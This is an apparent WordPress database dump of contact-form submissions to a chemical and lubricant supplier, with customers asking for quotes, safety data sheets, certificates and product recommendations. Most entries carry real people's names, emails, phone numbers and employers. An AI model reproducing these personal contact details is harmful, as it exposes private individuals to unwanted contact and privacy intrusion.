INSERT INTO `wp_postmeta` VALUES (32651, 3665, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32652, 3665, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32653, 3665, '_field_1', 'PASCU ADRAIN'); 
INSERT INTO `wp_postmeta` VALUES (32654, 3665, '_field_10', 'RAMDISTRIB IMPEX SRL'); 
INSERT INTO `wp_postmeta` VALUES (32655, 3665, '_field_2', 'adi5pascu@yahoo.com'); 
INSERT INTO `wp_postmeta` VALUES (32656, 3665, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32657, 3665, '_field_3', 'I need to buy a small quantity of VAZO 52 -2,2&#039;-azobis(2,4-dimethyl-pentanenitrile)'); 
INSERT INTO `wp_postmeta` VALUES (32658, 3665, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32659, 3665, '_sub_id', '3665'); 
INSERT INTO `wp_postmeta` VALUES (32660, 3666, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32661, 3666, '_seq_num', '226'); 
INSERT INTO `wp_postmeta` VALUES (32662, 3666, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32663, 3666, '_field_12', 'Julieta Rios'); 
INSERT INTO `wp_postmeta` VALUES (32664, 3666, '_field_13', 'Fastenal'); 
INSERT INTO `wp_postmeta` VALUES (32665, 3666, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32666, 3666, '_field_14', 'jrios@fastenal.com'); 
INSERT INTO `wp_postmeta` VALUES (32667, 3666, '_field_15', '(528) 181-1050'); 
INSERT INTO `wp_postmeta` VALUES (32668, 3666, '_field_16', 'Good morning, please your support for getting the new replacement for the following item:\r\n\r\nName: MS-143DF\r\nDescription: Release Agent/Dry Lubricant\r\nContainer size: Gallon\r\n \r\nI&#039;ll stay pending on your comment, thank you very much in advance.'); 
INSERT INTO `wp_postmeta` VALUES (32669, 3666, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32670, 3666, '_sub_id', '3666'); 
INSERT INTO `wp_postmeta` VALUES (32671, 3667, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32672, 3667, '_seq_num', '348'); 
INSERT INTO `wp_postmeta` VALUES (32673, 3667, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32674, 3667, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32675, 3667, '_field_1', 'Naz Kawsar'); 
INSERT INTO `wp_postmeta` VALUES (32676, 3667, '_field_10', 'dbell Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32677, 3667, '_field_2', 'naz@dbell.ca'); 
INSERT INTO `wp_postmeta` VALUES (32678, 3667, '_field_8', '(416) 477-2154'); 
INSERT INTO `wp_postmeta` VALUES (32679, 3667, '_field_3', 'I like to order conformal coating but not sure which type is appropriate for our PCB board -used outside.\r\n\r\nCan you  help determine the right type?\r\n\r\nThanks \r\nNaz'); 
INSERT INTO `wp_postmeta` VALUES (32680, 3667, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32681, 3667, '_sub_id', '3667'); 
INSERT INTO `wp_postmeta` VALUES (32682, 3668, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32683, 3668, '_seq_num', '349'); 
INSERT INTO `wp_postmeta` VALUES (32684, 3668, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32685, 3668, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32686, 3668, '_field_1', 'Renzo Orsenigo'); 
INSERT INTO `wp_postmeta` VALUES (32687, 3668, '_field_10', 'ORVIM SRL'); 
INSERT INTO `wp_postmeta` VALUES (32688, 3668, '_field_2', 'rorsenigo@orvim.com'); 
INSERT INTO `wp_postmeta` VALUES (32689, 3668, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32690, 3668, '_field_3', 'Dear Miller and Stephenson,\nORVIM is an Italian company near Milan  (Italy).\nPlease, let me know if we can purchase from you the epoxy adhesive kit MS-907. I need 4 packs.  If it is possible could you send to me a quote? Thank you and best regards. Renzo Orsenigo '); 
INSERT INTO `wp_postmeta` VALUES (32691, 3668, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32692, 3668, '_sub_id', '3668'); 
INSERT INTO `wp_postmeta` VALUES (32693, 3669, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32694, 3669, '_seq_num', '227'); 
INSERT INTO `wp_postmeta` VALUES (32695, 3669, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32696, 3669, '_field_12', 'Steve Grass'); 
INSERT INTO `wp_postmeta` VALUES (32697, 3669, '_field_13', 'STP Performnace Coating, LLC'); 
INSERT INTO `wp_postmeta` VALUES (32698, 3669, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32699, 3669, '_field_14', 'steve@performancecoating.com'); 
INSERT INTO `wp_postmeta` VALUES (32700, 3669, '_field_15', '(602) 276-1231'); 
INSERT INTO `wp_postmeta` VALUES (32701, 3669, '_field_16', 'I have an old requirement for MS-143AD and I don&#039;t see it on the website. Has it been replaced by another MS-143 product?'); 
INSERT INTO `wp_postmeta` VALUES (32702, 3669, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32703, 3669, '_sub_id', '3669'); 
INSERT INTO `wp_postmeta` VALUES (32704, 3670, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32705, 3670, '_seq_num', '228'); 
INSERT INTO `wp_postmeta` VALUES (32706, 3670, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32707, 3670, '_field_12', 'Raleigh Cruz'); 
INSERT INTO `wp_postmeta` VALUES (32708, 3670, '_field_13', 'IKO Industries'); 
INSERT INTO `wp_postmeta` VALUES (32709, 3670, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32710, 3670, '_field_14', 'raleigh.cruz@iko.com'); 
INSERT INTO `wp_postmeta` VALUES (32711, 3670, '_field_15', '(905) 457-2880'); 
INSERT INTO `wp_postmeta` VALUES (32712, 3670, '_field_16', 'I would to request for the following test parameters on your Krytox GPL-217 EP as well as the unit cost (US$__/8oz tube; US$ __/1.76lb cartridge; US$__/7kg pail; US$__/20kg pail):\r\n- Timken OK load LBS\r\n- Four ball EP Weld Load, kg\r\n- Four Ball EP Load Wear Index\r\n- Four Ball wear test, scar diameter, mm\r\n- Dropping Point, F (C)\r\n- Viscosity Index\r\n- Flash Point, COC\r\n- Pour Point\r\n- Rust Prevention\r\n- Copper Corrosion\r\n- Water Spray off % loss\r\n- Oxidation Stability at 100 hrs PSI loss\r\n- Maximum intermittent temp\r\nThanks.\r\n\r\nRaleigh Cruz\r\n905-457-2880 extn: 3362'); 
INSERT INTO `wp_postmeta` VALUES (32713, 3670, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32714, 3670, '_sub_id', '3670'); 
INSERT INTO `wp_postmeta` VALUES (32715, 3671, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32716, 3671, '_seq_num', '229'); 
INSERT INTO `wp_postmeta` VALUES (32717, 3671, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32718, 3671, '_field_12', 'Jamie Young'); 
INSERT INTO `wp_postmeta` VALUES (32719, 3671, '_field_13', 'Figeac Aero North America, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32720, 3671, '_field_18', '?'); 
INSERT INTO `wp_postmeta` VALUES (32721, 3671, '_field_14', 'jamie.young@figeac-aero.com'); 
INSERT INTO `wp_postmeta` VALUES (32722, 3671, '_field_15', '(316) 634-2500'); 
INSERT INTO `wp_postmeta` VALUES (32723, 3671, '_field_16', 'Missing certificate of conformance/analysis.  I have MS-143H PTFE Release Agent - Dry Lubricant  Lot #: 2982-43/3112-CN .  If you could provide a certificate for this material, that would be wonderful....\n\n\nThanks,   Jamie Young'); 
INSERT INTO `wp_postmeta` VALUES (32724, 3671, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32725, 3671, '_sub_id', '3671'); 
INSERT INTO `wp_postmeta` VALUES (32726, 3672, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32727, 3672, '_seq_num', '350'); 
INSERT INTO `wp_postmeta` VALUES (32728, 3672, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32729, 3672, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32730, 3672, '_field_1', 'Lara Moore'); 
INSERT INTO `wp_postmeta` VALUES (32731, 3672, '_field_10', 'ATI'); 
INSERT INTO `wp_postmeta` VALUES (32732, 3672, '_field_2', 'lmoore@atitest.com'); 
INSERT INTO `wp_postmeta` VALUES (32733, 3672, '_field_8', '(410) 363-9696'); 
INSERT INTO `wp_postmeta` VALUES (32734, 3672, '_field_3', 'Hello,\r\n\r\nWe are currently using your acrylic conformal coat, MS-465 on our boards but we are running into an issue where the low viscosity of this coating is such that we can&#039;t fully encapsulate taller components on our board. Can you recommend a more viscous alternative that will wick up underneath tall through-mounted components (approx. 0.020 inches) above the board. '); 
INSERT INTO `wp_postmeta` VALUES (32735, 3672, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32736, 3672, '_sub_id', '3672'); 
INSERT INTO `wp_postmeta` VALUES (32737, 3673, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32738, 3673, '_seq_num', '351'); 
INSERT INTO `wp_postmeta` VALUES (32739, 3673, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32740, 3673, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32741, 3673, '_field_1', 'vivian'); 
INSERT INTO `wp_postmeta` VALUES (32742, 3673, '_field_10', 'NOTE ELECTRONICS(DONG GUAN)LTD.'); 
INSERT INTO `wp_postmeta` VALUES (32743, 3673, '_field_2', 'vivian.peng@note.eu'); 
INSERT INTO `wp_postmeta` VALUES (32744, 3673, '_field_8', '(076) 872-9099'); 
INSERT INTO `wp_postmeta` VALUES (32745, 3673, '_field_3', 'Do you have in China sales MS - 262'); 
INSERT INTO `wp_postmeta` VALUES (32746, 3673, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32747, 3673, '_sub_id', '3673'); 
INSERT INTO `wp_postmeta` VALUES (32748, 3674, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32749, 3674, '_seq_num', '230'); 
INSERT INTO `wp_postmeta` VALUES (32750, 3674, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32751, 3674, '_field_12', 'A.J. Emrick'); 
INSERT INTO `wp_postmeta` VALUES (32752, 3674, '_field_13', 'Viracon'); 
INSERT INTO `wp_postmeta` VALUES (32753, 3674, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32754, 3674, '_field_14', 'ajemrick@viracon.com'); 
INSERT INTO `wp_postmeta` VALUES (32755, 3674, '_field_15', ''); 
INSERT INTO `wp_postmeta` VALUES (32756, 3674, '_field_16', 'Hello,\nWe are a large glass fabricator who use a series of autoclaves as part of the lamination process.  We shuttle heavy duty carts containing as much as 10,000 pounds of glass panels, in and out of the autoclave.  The &quot;charge&quot; last 3 hours and heats to 280 deg F at a pressure of 175 psi,\nI haven&#039;t been able to find a bearing grease (for the cart wheels) that can withstand this time / temp / pressure combination.  \nCan you recommend a krytox or other product for this application?\nThank You\nA.J. Emrick\n'); 
INSERT INTO `wp_postmeta` VALUES (32757, 3674, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32758, 3674, '_sub_id', '3674'); 
INSERT INTO `wp_postmeta` VALUES (32759, 3675, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32760, 3675, '_seq_num', '352'); 
INSERT INTO `wp_postmeta` VALUES (32761, 3675, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32762, 3675, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32763, 3675, '_field_1', 'Matthew Waite'); 
INSERT INTO `wp_postmeta` VALUES (32764, 3675, '_field_10', 'IVEK Corporation'); 
INSERT INTO `wp_postmeta` VALUES (32765, 3675, '_field_2', 'mwaite@ivek.com'); 
INSERT INTO `wp_postmeta` VALUES (32766, 3675, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32767, 3675, '_field_3', 'Looking for 8 oz tubes of:\r\nKrytox FG 24\r\nKrytox FG 34\r\nPrice and availability.  Thanks.'); 
INSERT INTO `wp_postmeta` VALUES (32768, 3675, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32769, 3675, '_sub_id', '3675'); 
INSERT INTO `wp_postmeta` VALUES (32770, 3676, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32771, 3676, '_seq_num', '353'); 
INSERT INTO `wp_postmeta` VALUES (32772, 3676, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32773, 3676, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32774, 3676, '_field_1', 'John L. Murray'); 
INSERT INTO `wp_postmeta` VALUES (32775, 3676, '_field_10', 'Pittsburg State University'); 
INSERT INTO `wp_postmeta` VALUES (32776, 3676, '_field_2', 'jlmurray@gus.pittstate.edu'); 
INSERT INTO `wp_postmeta` VALUES (32777, 3676, '_field_8', '(620) 687-2680'); 
INSERT INTO `wp_postmeta` VALUES (32778, 3676, '_field_3', 'Looking to obtain a SDS for product MS143N TFE Release Agent Dry Lubricant.  '); 
INSERT INTO `wp_postmeta` VALUES (32779, 3676, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32780, 3676, '_sub_id', '3676'); 
INSERT INTO `wp_postmeta` VALUES (32781, 122, '_thumbnail_id', '3678'); 
INSERT INTO `wp_postmeta` VALUES (32782, 3678, '_wp_attached_file', '2016/08/shutterstock_161788985.jpg'); 
INSERT INTO `wp_postmeta` VALUES (32783, 3678, '_wp_attachment_metadata', 'a:6:{s:5:"width";i:1000;s:6:"height";i:642;s:4:"file";s:34:"2016/08/shutterstock_161788985.jpg";s:5:"sizes";a:7:{s:9:"thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161788985-340x340.jpg";s:5:"width";i:340;s:6:"height";i:340;s:9:"mime-type";s:10:"image/jpeg";}s:6:"medium";a:4:{s:4:"file";s:34:"shutterstock_161788985-800x514.jpg";s:5:"width";i:800;s:6:"height";i:514;s:9:"mime-type";s:10:"image/jpeg";}s:12:"medium_large";a:4:{s:4:"file";s:34:"shutterstock_161788985-768x493.jpg";s:5:"width";i:768;s:6:"height";i:493;s:9:"mime-type";s:10:"image/jpeg";}s:25:"display_product_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161788985-250x250.jpg";s:5:"width";i:250;s:6:"height";i:250;s:9:"mime-type";s:10:"image/jpeg";}s:14:"shop_thumbnail";a:4:{s:4:"file";s:34:"shutterstock_161788985-200x200.jpg";s:5:"width";i:200;s:6:"height";i:200;s:9:"mime-type";s:10:"image/jpeg";}s:12:"shop_catalog";a:4:{s:4:"file";s:34:"shutterstock_161788985-225x225.jpg";s:5:"width";i:225;s:6:"height";i:225;s:9:"mime-type";s:10:"image/jpeg";}s:11:"shop_single";a:4:{s:4:"file";s:34:"shutterstock_161788985-510x600.jpg";s:5:"width";i:510;s:6:"height";i:600;s:9:"mime-type";s:10:"image/jpeg";}}s:10:"image_meta";a:12:{s:8:"aperture";s:1:"0";s:6:"credit";s:0:"";s:6:"camera";s:0:"";s:7:"caption";s:0:"";s:17:"created_timestamp";s:1:"0";s:9:"copyright";s:0:"";s:12:"focal_length";s:1:"0";s:3:"iso";s:1:"0";s:13:"shutter_speed";s:1:"0";s:5:"title";s:0:"";s:11:"orientation";s:1:"0";s:8:"keywords";a:0:{}}s:7:"optimus";a:3:{s:6:"profit";s:1:"4";s:8:"quantity";d:88;s:4:"webp";i:0;}}'); 
INSERT INTO `wp_postmeta` VALUES (32784, 3682, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32785, 3682, '_seq_num', '231'); 
INSERT INTO `wp_postmeta` VALUES (32786, 3682, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32787, 3682, '_field_12', 'Vinny DeLuca'); 
INSERT INTO `wp_postmeta` VALUES (32788, 3682, '_field_13', 'Medtronic (MITG/ Formerly Covidien)'); 
INSERT INTO `wp_postmeta` VALUES (32789, 3682, '_field_18', '?'); 
INSERT INTO `wp_postmeta` VALUES (32790, 3682, '_field_14', 'vincenzo.deluca@medtronic.com'); 
INSERT INTO `wp_postmeta` VALUES (32791, 3682, '_field_15', '(203) 492-5286'); 
INSERT INTO `wp_postmeta` VALUES (32792, 3682, '_field_16', 'We specify a Miller Stepenson Teflon Coating 143E.  I would like to cut some general information on it.  I tried a search but.....'); 
INSERT INTO `wp_postmeta` VALUES (32793, 3682, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32794, 3682, '_sub_id', '3682'); 
INSERT INTO `wp_postmeta` VALUES (32795, 3683, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32796, 3683, '_seq_num', '232'); 
INSERT INTO `wp_postmeta` VALUES (32797, 3683, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32798, 3683, '_field_12', 'Sam Xiao'); 
INSERT INTO `wp_postmeta` VALUES (32799, 3683, '_field_13', 'Noritake Co., Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32800, 3683, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32801, 3683, '_field_14', 'sam.ele@noritake.com'); 
INSERT INTO `wp_postmeta` VALUES (32802, 3683, '_field_15', '(847) 439-9020'); 
INSERT INTO `wp_postmeta` VALUES (32803, 3683, '_field_16', 'Please send me the latest version of REACH material declaration for Silicone type conformal  coatings (MS-460H/462H). Thanks a lot.\r\n\r\nRegards,\r\n\r\nSam'); 
INSERT INTO `wp_postmeta` VALUES (32804, 3683, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32805, 3683, '_sub_id', '3683'); 
INSERT INTO `wp_postmeta` VALUES (32806, 3684, '_form_id', '11'); 
INSERT INTO `wp_postmeta` VALUES (32807, 3684, '_seq_num', '233'); 
INSERT INTO `wp_postmeta` VALUES (32808, 3684, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32809, 3684, '_field_12', 'Rob Hooper, EHS Engineer'); 
INSERT INTO `wp_postmeta` VALUES (32810, 3684, '_field_13', 'Schweitzer Engineering Laboratories, Inc.'); 
INSERT INTO `wp_postmeta` VALUES (32811, 3684, '_field_18', ''); 
INSERT INTO `wp_postmeta` VALUES (32812, 3684, '_field_14', 'rob_hooper@selinc.com'); 
INSERT INTO `wp_postmeta` VALUES (32813, 3684, '_field_15', '(509) 334-8875'); 
INSERT INTO `wp_postmeta` VALUES (32814, 3684, '_field_16', 'Many years ago back in my Mfg Engineering days, M-S had a Cobra Brush Applicator for your flux removers. Could the Cobra duster be used with any of your solder flux removers? We have some applications where we could use a small brush applicator for defluxing SMT components after rework. Please advise if you still have an applicator for flux removers. Thank you for your assistance. Regards, Rob Hooper, CSP '); 
INSERT INTO `wp_postmeta` VALUES (32815, 3684, '_field_17', ''); 
INSERT INTO `wp_postmeta` VALUES (32816, 3684, '_sub_id', '3684'); 
INSERT INTO `wp_postmeta` VALUES (32817, 3685, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32818, 3685, '_seq_num', '354'); 
INSERT INTO `wp_postmeta` VALUES (32819, 3685, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32820, 3685, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32821, 3685, '_field_1', 'Ann Matthews'); 
INSERT INTO `wp_postmeta` VALUES (32822, 3685, '_field_10', 'Barden Corporation'); 
INSERT INTO `wp_postmeta` VALUES (32823, 3685, '_field_2', 'Matthan@Schaeffler.com'); 
INSERT INTO `wp_postmeta` VALUES (32824, 3685, '_field_8', '(203) 744-2211'); 
INSERT INTO `wp_postmeta` VALUES (32825, 3685, '_field_3', 'Please email ISO 9001.  Thank you.'); 
INSERT INTO `wp_postmeta` VALUES (32826, 3685, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32827, 3685, '_sub_id', '3685'); 
INSERT INTO `wp_postmeta` VALUES (32828, 3686, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32829, 3686, '_seq_num', '355'); 
INSERT INTO `wp_postmeta` VALUES (32830, 3686, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32831, 3686, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32832, 3686, '_field_1', 'Zezelia Olson'); 
INSERT INTO `wp_postmeta` VALUES (32833, 3686, '_field_10', 'Wesco Aircraft'); 
INSERT INTO `wp_postmeta` VALUES (32834, 3686, '_field_2', 'zezelia.olson@wescoair.com'); 
INSERT INTO `wp_postmeta` VALUES (32835, 3686, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32836, 3686, '_field_3', 'I am unable to find the classifications for an ingredient listed on the SDS for product MS-122AD, PTFE Release Agent / Dry Lubricant, DPMS-Z0918A via the European Chemical Agency.  Could you send me the classification you have for CAS no.: 65530-85-0? Many thanks.'); 
INSERT INTO `wp_postmeta` VALUES (32837, 3686, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32838, 3686, '_sub_id', '3686'); 
INSERT INTO `wp_postmeta` VALUES (32839, 3687, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32840, 3687, '_seq_num', '356'); 
INSERT INTO `wp_postmeta` VALUES (32841, 3687, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32842, 3687, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32843, 3687, '_field_1', 'Rine Jony'); 
INSERT INTO `wp_postmeta` VALUES (32844, 3687, '_field_10', 'bogucki enterprises'); 
INSERT INTO `wp_postmeta` VALUES (32845, 3687, '_field_2', 'rine@boguckienterprises.com'); 
INSERT INTO `wp_postmeta` VALUES (32846, 3687, '_field_8', '(210) 803-3771'); 
INSERT INTO `wp_postmeta` VALUES (32847, 3687, '_field_3', 'Dear Sir/Madam,\r\nGood day,\r\nWe are an approved vendor to supply to the US Govt.We supply to the US Military bases within US &amp; worldwide.Could you please provide your best possible pricing to ensure the ability to win this bid.\r\n2boxes –P/N: MS242N\r\nKindly quote ASAP.\r\n\r\nPlease advice the lead time/availability, freight NJ 08081 if there is any,shipping weight &amp; dimensions.\r\nLet us know if you have any questions.\r\nThank you and look forward to your response at the earliest.\r\nRespectfully,\r\nRine Jony                   \r\nwww.boguckienterprises.com\r\n101 Allied Parkway\r\nWinslow, NJ 08081\r\n------\r\nToll-Free: (888)-589-0074\r\nFax: (888)-688-4130\r\nOffice: 856-513-2234\r\n'); 
INSERT INTO `wp_postmeta` VALUES (32848, 3687, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32849, 3687, '_sub_id', '3687'); 
INSERT INTO `wp_postmeta` VALUES (32850, 3688, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32851, 3688, '_seq_num', '357'); 
INSERT INTO `wp_postmeta` VALUES (32852, 3688, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32853, 3688, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32854, 3688, '_field_1', 'Gary Schneider'); 
INSERT INTO `wp_postmeta` VALUES (32855, 3688, '_field_10', 'Hi-Techniques'); 
INSERT INTO `wp_postmeta` VALUES (32856, 3688, '_field_2', 'schneider@hi-techniques.com'); 
INSERT INTO `wp_postmeta` VALUES (32857, 3688, '_field_8', '(608) 221-7500'); 
INSERT INTO `wp_postmeta` VALUES (32858, 3688, '_field_3', 'Want to coat PCBs for moisture protection in a new rugged DAQ system. Anticipate acrylic for repairability. What differs between 465 and 475?'); 
INSERT INTO `wp_postmeta` VALUES (32859, 3688, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32860, 3688, '_sub_id', '3688'); 
INSERT INTO `wp_postmeta` VALUES (32861, 3689, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32862, 3689, '_seq_num', '358'); 
INSERT INTO `wp_postmeta` VALUES (32863, 3689, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32864, 3689, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32865, 3689, '_field_1', 'Hyo-Joong Kim'); 
INSERT INTO `wp_postmeta` VALUES (32866, 3689, '_field_10', 'ROK Air Force'); 
INSERT INTO `wp_postmeta` VALUES (32867, 3689, '_field_2', '0rhantls0@naver.com'); 
INSERT INTO `wp_postmeta` VALUES (32868, 3689, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32869, 3689, '_field_3', 'I am with the Republic of Korea&#039;s Air Force. We currently utilize one of your release agent products, MS-143E (NSN 9150010789586). I cannot locate any information about this product on the company webstie. If you could please provide MSDS (Material Safety Data Sheet) on MS-143E (NSN 9150010789586) or provide a guideline on how we might acquire it, we would really appreciate it. Thank you very much.'); 
INSERT INTO `wp_postmeta` VALUES (32870, 3689, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32871, 3689, '_sub_id', '3689'); 
INSERT INTO `wp_postmeta` VALUES (32872, 3692, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32873, 3692, '_seq_num', '359'); 
INSERT INTO `wp_postmeta` VALUES (32874, 3692, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32875, 3692, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32876, 3692, '_field_1', 'Peter Sweeney'); 
INSERT INTO `wp_postmeta` VALUES (32877, 3692, '_field_10', 'United Tool &amp; Die'); 
INSERT INTO `wp_postmeta` VALUES (32878, 3692, '_field_2', 'petersweeney@utdco.com'); 
INSERT INTO `wp_postmeta` VALUES (32879, 3692, '_field_8', '(860) 882-6602'); 
INSERT INTO `wp_postmeta` VALUES (32880, 3692, '_field_3', 'Looking for pricing on Vertrel SDG 55 gal drums, delivered to West Hartford.  We are switching from nPB.'); 
INSERT INTO `wp_postmeta` VALUES (32881, 3692, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32882, 3692, '_sub_id', '3692'); 
INSERT INTO `wp_postmeta` VALUES (32886, 3698, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32887, 3698, '_seq_num', '360'); 
INSERT INTO `wp_postmeta` VALUES (32888, 3698, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32889, 3698, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32890, 3698, '_field_1', 'Pam Vinojah'); 
INSERT INTO `wp_postmeta` VALUES (32891, 3698, '_field_10', 'Parson Adhesives Inc'); 
INSERT INTO `wp_postmeta` VALUES (32892, 3698, '_field_2', 'padma@parsonadhesives.com'); 
INSERT INTO `wp_postmeta` VALUES (32893, 3698, '_field_8', '(248) 563-6220'); 
INSERT INTO `wp_postmeta` VALUES (32894, 3698, '_field_3', 'I would like to get a sample of VAZO 64.'); 
INSERT INTO `wp_postmeta` VALUES (32895, 3698, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32896, 3698, '_sub_id', '3698'); 
INSERT INTO `wp_postmeta` VALUES (32897, 3699, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32898, 3699, '_seq_num', '361'); 
INSERT INTO `wp_postmeta` VALUES (32899, 3699, '_action', 'submit'); 
INSERT INTO `wp_postmeta` VALUES (32900, 3699, '_field_26', '&lt;BR&gt;\r\nPlease Fill out the form below for further info:\r\n&lt;BR&gt;'); 
INSERT INTO `wp_postmeta` VALUES (32901, 3699, '_field_1', 'Goh Jie Ke'); 
INSERT INTO `wp_postmeta` VALUES (32902, 3699, '_field_10', 'Singapore Technologies Aerospace Ltd'); 
INSERT INTO `wp_postmeta` VALUES (32903, 3699, '_field_2', 'gohjieke@stengg.com'); 
INSERT INTO `wp_postmeta` VALUES (32904, 3699, '_field_8', ''); 
INSERT INTO `wp_postmeta` VALUES (32905, 3699, '_field_3', 'Hi, \n\nDo you have a product called Johnson Wax or Jon-cote? Thank you.\n\nRegards, \nGoh Jie Ke \nSenior Engineer \n\nEngineering &amp; Development Centre \nSingapore Technologies Aerospace Ltd\n540 Airport Road Singapore 539938 '); 
INSERT INTO `wp_postmeta` VALUES (32906, 3699, '_field_4', ''); 
INSERT INTO `wp_postmeta` VALUES (32907, 3699, '_sub_id', '3699'); 
INSERT INTO `wp_postmeta` VALUES (32908, 3700, '_form_id', '1'); 
INSERT INTO `wp_postmeta` VALUES (32909, 3700, '_seq_num', '362'); 
